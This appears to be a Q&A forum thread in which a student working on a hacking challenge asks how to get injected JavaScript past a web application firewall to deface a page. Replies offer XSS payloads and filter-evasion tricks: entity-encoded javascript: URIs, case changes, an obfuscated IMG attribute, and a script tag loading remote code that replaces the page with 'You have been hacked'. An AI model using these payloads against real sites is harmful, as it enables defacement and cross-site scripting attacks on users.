# Bypass window.onload

Tags: javascript

I'm a student who has to deal with an intern hacking challenge. I'm that far that I'm able to insert JavaScript code.

The only problem is that I'll have to deal with a firewall.
So far so good I've managed to load an `<a>` tag with JavaScript in it.

Now I'm trying to change the webpage onload to another page.

Unfortunately a firewall blocks the 'onload' statement.
Is there another way to bypass this?

It seems like innerHtml is only local and it doesn't change the index page.

```
<a id="bb" href="javascript&colon;document.body.innerHTML=&quot;foo&quot;">clicks</a>
```

Comment: Can you explain how you currently modify the page? Do you have read/write access to the html file on the server? Is it pure html, or is there a server-side language used, like `php`?

Comment: it's pure html with direct acces. You put a text you enter and it appaers directly if the firewall webknight doesn't detect it

Answer (score 0):

You can try to insert something like this in the `<head>` part:

```
<script src="http://url/to/myhackingcode.js"></script>
```

And in your controlled `myhackingcode.js` you could do:

```
setTimeout(function() {
    document.body.innerHTML = '<h1> You have been hacked </h1>';
    // Any other things you'd like to do, come here
}, 1000);
```

Which would replace the entire body content of the page with the `html` you provide.

Comment: Thx for trying but the firewall seems to block the 'script' tag :(

Comment: Could you maybe put in your question the complete list that is blocked by the firewall? We are otherwise just aiming in the dark.

Comment: Sadly enough I can only try and see if it blocks it or not.

Comment: I've found this : <a id="bb" href="javascript&colon;
window.ready= &quot;<html><h2>Bypassed by Steven</h2></html></html>&quot;"
>clicks</a> but why doesn't it overrides the winodw.ready permanently ?

Comment: Yes, but that will only execute if a user clicks on that link. Or is that what you wanted to do? And window.ready is just a variable. What do you expect it to do?

Comment: I wan't to change the hole page to this. from the moment you click it one time the page should be overwritten by my <h1> tag

Comment: Try with `img` instead of `script`, like this: `<IMG SRC="javascript:alert('XSS');">` Does that pass, and does it show the alert when you load the page?

Comment: Doesn't pass.. But this one does : <a id="bb" href="javaSCRIPT&colon;alert(1)">clicks</a>

Comment: And this: `<IMG SRC="javascript&colon;alert(1);">` ?

Comment: SRC was the problem. so this one works : <IMG SR&plus;C="javascript&colon;alert(1);"> *Edit* the firewall gets bypassed but it seems like it doesn't execute any of it

Comment: Too bad :( any other ideas ?

Comment: There are several ideas [here](https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet)